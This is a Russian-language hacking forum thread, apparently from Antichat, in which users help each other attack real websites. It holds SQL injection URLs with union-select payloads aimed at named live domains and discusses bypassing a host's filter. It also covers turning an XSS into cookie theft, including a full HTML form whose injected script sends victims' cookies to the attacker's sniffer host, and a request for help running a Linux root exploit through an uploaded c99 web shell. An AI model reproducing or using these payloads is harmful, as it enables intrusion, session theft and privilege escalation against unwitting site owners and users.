Code: http://rk-triada.ru/index.php?page=999-скорее всего есть,но это blind http://www.15rus.ru//e107_plugins/coppermine_menu/index.php?cat=999-нет
Вот например http://forum.antichat.ru/thread56221-blind+sql.html Также на Ачате есть статья по blind inj
хм столкнулся с такой проблемой есть скуль Code: http://www.stroyazbuka.com/news/index.php?idnews=9999999+and 1=1/* количество столбцов подобраннно 13 при попытке вывести информацию о бд все нормально Code: http://www.stroyazbuka.com/news/index.php?idnews=99999999999+union+select+1,2,3,4,5,6,7,concat_ws(0x1,User(),Database(),Version()),9,10,11,12,13/* а вот когда пытаюсь сделать Запрос в таблицу редирректит на http://2.sweb.ru/insecure Насколько я понимаю это фильрация которую делает хотинг ? и можно ли её обойти ?
Три поста назад отвечал на тот же вопрос https://forum.antichat.ru/showpost.php?p=828862&postcount=3054 Тему лень смотреть?
спс Ну как то да 307 страниц смотреть как то лениво !!! поиск по форуму зделал не чего не нашел !хм.. оказываеться все так просто как сам не догадался post попробовать видать тупею )
Нашол я XSS. При реге я вставляю код в mail такой вот ><script>alert('XSS')</script> Нажимаю "Зарегистрироваться" так он мне XSS вышибает (ну я не удивился) Сами вопросы: 1-Почему я когда вставляю "><script>alert('XSS')</script> то в то поле каторое я вставил это (то есть в в поле маил) то туда выплевываеться(когда я нажал на кннопку "Зарегиться") след код Code: ><script>alert('XSS')</script>>> </td> </tr> <tr> <td> Секретный вопрос: </td> <td> <INPUT size=40 maxlength=50 TYPE=TEXT NAME=question> </td> </tr> <tr> <td> Секретный ответ: </td> <td> <INPUT size=40 maxlength=50 TYPE=TEXT NAME=answer value= В чем дело??? 2-Как можно заюзать эту XSS??? она же токо при реге
Привет, не подскажете, как запустить сплоит на повышение привилегий в Linux 2.6.22-gentoo-r8 , а то залил шелл (с99), пытаюсь запустить сплойт через шелл, никаких изменений, пытаюсь запустить через www , так показывает только текст сплоита, подскажите пожалуйста , сплоит пытался запустить Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit
ответ 1: в поле выплевывает вышеописанную лабуду т.к. ломается html код. зайдя в исходник страницы ты сможешь увидеть почему это происходит (советую скачать например notepad++ он выделит цветом где в коде незакрытые тэги и т.д) ответ 2 заюзать xss вполне реально и неважно в каком месте сайта оно находиться =) все что нужно это составить html страничку которая будет post запросом передавать полю email соответсвующие параметры. а потом впарить жертве ссылку на эту страницу. вот ссылка на статью с примером такой странички. там впринципе все написанно достаточно подробно. т.е ты на своем серваке ставишь: 1. снифер 2. страничку с специально сформированным html кодом. после чего через личное сообщение,чат или другие средства общения на сайте впариваешь ссылку. человек идет по ссылке и куки твои.
Вот кстати возникли проблеммы с данной процедурой получения кукисов. нашел следующее xss на сайте. в фотогалерее есть поле "текущая страница" (т.е. меняя значение в данном поле можно перемещаться по следующим страницам). при попытке поменять get параметры в адресной строке нарвался на фильтр составил html код следующего вида Code: <html> <head> <meta http-equiv="content-type" content="text/html; charset=windows-1251" /> </head> <body onLoad="document.REPLIER.submit();"> <h3>сейчас вы будете перенаправлены</h3> <form action="http://хххх.ru/index.php?page=log" method="post" name="REPLIER" "> <input type='hidden' name='page' value=' "><script language="JavaScript">aa1 = new Image(); aa1.src="http://мой_сниффер/img.php?2222"+document.cookie;</script>'> </form> </body> </html> сниферить то сниферит но вот только без куков т.е. в снифере остаеться ip и строка "2222" пожалуйста подскажите почему в снифере не записываются куки и в чем моя ошибка?
есть скул. запрос: Code: http://www.сайт/index.php?id=42222'+union+select+1,2,3+from+information_schema.tables/* сервер отвечает загрузкой страницы, такой же как Code: http://www.сайт/index.php?id=42222 пробую найти поля, которые выводятся на экран: Code: http://www.сайт/index.php?id=-1'+union+select+1,2,3+from+information_schema.tables/* http://www.сайт/index.php?id=42222'+and+1=9+union+select+1,2,3+from+information_schema.tables/* http://www.сайт/index.php?id='+union+select+1,2,3+from+information_schema.tables/* Не получается. пишет ошибку. как ещё можно вывести на экран поля?
чет я не понимаю вопроса если честно! у тебя в скули нет полей для вывода ? если нет то только blind sql !и есче вопрос что ты пытался сделать этими запросами в базу ?